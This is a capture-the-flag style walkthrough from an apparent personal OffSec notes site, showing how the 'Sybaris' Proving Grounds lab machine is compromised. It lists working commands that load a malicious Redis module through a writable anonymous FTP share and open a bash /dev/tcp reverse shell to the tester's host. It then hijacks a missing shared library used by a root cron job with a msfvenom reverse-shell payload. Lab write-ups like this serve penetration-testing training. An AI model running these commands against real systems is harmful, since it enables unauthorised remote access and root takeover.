OffSec Notes
  • Offensive Security Notes
    • Linux/Unix
      • Checklist - PrivEsc
        • Related Links
        • Kernel Exploits
        • MYSQL
          • HEX
        • SUID
        • Relative Path in SUID Program
        • Writable /etc/passwd file
        • Writable script in /etc/crontab
        • Writable services
        • Sudo <=1.8.14
        • Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
        • Docker
          • Docker Escape
        • davfs2
        • gcore
        • fail2ban
        • git
        • tar with wildcard
        • Exiftool
      • Limited Shell Escape
      • Wordpress
      • Apache Tomcat
      • Werkzeug Console PIN bypass
        • get_flask_pin.py
      • Java Object Deserialization
      • Redis RCE
      • mongodb
      • Postgres
      • Erlang - 4369
      • rsync - 873
      • Sendmail ClamAV
      • VNC Password Decryptor
    • Windows
      • Checklist - PrivEsc
        • MSSQL
        • PsExec.exe
        • Build Exploits
        • Unquoted Service Paths
        • SeImpersonateToken
        • SeRestorePrivilege
        • SeBackupPrivilege
        • Abuse GPO
        • Job with editable file
        • AlwaysInstallElevated
        • Misconfigured LDAP
        • GMSA
        • MS17-010
      • Useful PS Scripts
        • GetUserSPNs.ps1
        • Master MDF Hash Extraction
        • Spray-Passwords.ps1
      • Password Extraction
      • Office Macro
        • Microsoft Office
        • Open Office
      • Post Exploitation
    • Web
      • SQL Injection
        • mongodb 2.2.3
        • UNION BASED
          • MSSQL
          • Oracle
        • ERROR BASED
        • node.js
    • Nmap samples
    • Shells
      • node.js
      • msfvenom samples
      • Reverse Shells
      • Shellter
    • Enumeration
      • SMB
      • RPC
      • LDAP
    • Buffer Overflow
      • mona
      • fuzzer.py
      • exploit.py
      • bytearray.py
      • pattern_offset.rb
      • pattern_create.rb
    • Password Cracking
    • File Download
      • FTP
    • Port Forwarding
      • Dynamic Forwarding
    • Useful links
  • Blog
    • CRTO I & II
    • OSCP Preparation
    • New OSCP Exam vs Previous OSCP Exam
    • Movements in AD
    • PWK Lab vs PG Practice
  • PortSwigger Academy
    • Server-side topics
      • Authentication vulnerabilities
      • OS Command Injection
      • File Path Traversal
      • Business logic vulnerabilities
      • Information disclosure vulnerabilities
      • Access control vulnerabilities and privilege escalation
      • File upload vulnerabilities
      • Server-side request forgery (SSRF)
      • XML external entity (XXE) injection
    • Client-side topics
      • Cross-site scripting
      • Cross-origin resource sharing (CORS)
      • Cross-site request forgery (CSRF)
      • Clickjacking (UI redressing)
      • DOM-based vulnerabilities
      • Testing for WebSockets security vulnerabilities
    • Advanced topics
      • Insecure deserialization
      • Server-side template injection
      • Web cache poisoning
      • HTTP Host header attacks
      • HTTP request smuggling
      • OAuth 2.0 authentication vulnerabilities
      • JWT attacks
  • Walkthroughs
    • PG Practice
      • Linux
        • WARM UP
          • Bratarina
          • ClamAV
          • Exfiltrated
          • Hawat
          • Interface
          • Muddy
          • Pebbles
          • Twiggy
          • Wombo
        • GET TO WORK
          • Banzai
          • Cassios
          • Dibble
          • Fail
          • G00g
          • Hetemit
          • Hunit
          • Maria
          • Nappa
          • Nibbels
          • Nukem
          • Payday
          • Pelican
          • Readys
          • Roquefort
          • Snookums
          • Sorcerer
          • Splodge
          • Sybaris
          • Walla
          • Webcal
          • XposedAPI
          • ZenPhoto
          • Zino
          • QuackerJack
        • TRY HARDER
          • Clyde
          • Peppo
          • Sirol
      • Windows
        • WARM UP
          • Algernon
          • Compromised
          • Helpdesk
          • Internal
          • Kevin
          • Metallus
        • GET TO WORK
          • AuthBy
          • Billyboss
          • Craft
          • Fish
          • Hutch
          • Jacko
          • Nickel
          • Shenzi
          • Slort
        • TRY HARDER
          • Heist
          • Meathead
          • Vault
      • Template
  • About the author
Powered by GitBook
On this page
  • Enumeration
  • Initial Access
  • PrivEsc
  1. Walkthroughs
  2. PG Practice
  3. Linux
  4. GET TO WORK

Sybaris

PreviousSplodgeNextWalla

Last updated 3 years ago

Enumeration

21/tcp    open   ftp       vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0               6 Apr 01  2020 pub [NSE: writeable]
...
6379/tcp  open   redis     Redis key-value store 5.0.9
...

Initial Access

$ redis-cli -h 192.168.71.93

No need password. We can get a shell with Redis RCE.

$ git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git
$ cd RedisModules-ExecuteCommand 
$ make
$ cp module.so ../
ftp> put module.so

We can assume pub dir in base ftp dir which is /var/ftp.

$ redis-cli -h 192.168.71.93
192.168.71.93:6379> MODULE LOAD /var/ftp/pub/module.so
OK
192.168.71.93:6379> MODULE LIST
1) 1) "name"
   2) "system"
   3) "ver"
   4) (integer) 1
192.168.71.93:6379> system.exec "whoami"
"pablo\n"

https://www.revshells.com/ - Bash 196 - 192.168.49.71 80 /bin/bash

0<&196;exec 196<>/dev/tcp/192.168.49.71/80; /bin/bash <&196 >&196 2>&196
192.168.71.93:6379> system.exec "0<&196;exec 196<>/dev/tcp/192.168.49.71/80; /bin/bash <&196 >&196 2>&196"

PrivEsc

Getting stable shell.

[pablo@sybaris users]$ pwd
/var/www/html/config/users

[pablo@sybaris users]$ cat pablo.ini
password = [REDACTED]
role = admin

ssh -> pablo:[REDACTED]

[pablo@sybaris html]$ cat /etc/crontab
...
LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
...
  *  *  *  *  * root       /usr/bin/log-sweeper
  
[pablo@sybaris html]$ /usr/bin/log-sweeper
/usr/bin/log-sweeper: error while loading shared libraries: utils.so: cannot open shared object file: No such file or directory

[pablo@sybaris html]$ ldd /usr/bin/log-sweeper
        linux-vdso.so.1 =>  (0x00007ffce1f9a000)
        utils.so => not found
        libc.so.6 => /lib64/libc.so.6 (0x00007f0ece0d4000)
        /lib64/ld-linux-x86-64.so.2 (0x00007f0ece4a2000)

There is a missing shared library which is utils.so. According to the crontab, there is a writable dir which is /usr/local/lib/dev(Ref. LD_LIBRARY_PATH). We can use this situation to get root shell.

$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.71 LPORT=80 -f elf-so -o utils.so
[pablo@sybaris dev]$ pwd
/usr/local/lib/dev
[pablo@sybaris dev]$ wget http://192.168.49.71/utils.so

In a minute, we could get root shell.

https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#load-redis-module
https://www.contextis.com/en/blog/linux-privilege-escalation-via-dynamically-linked-shared-object-library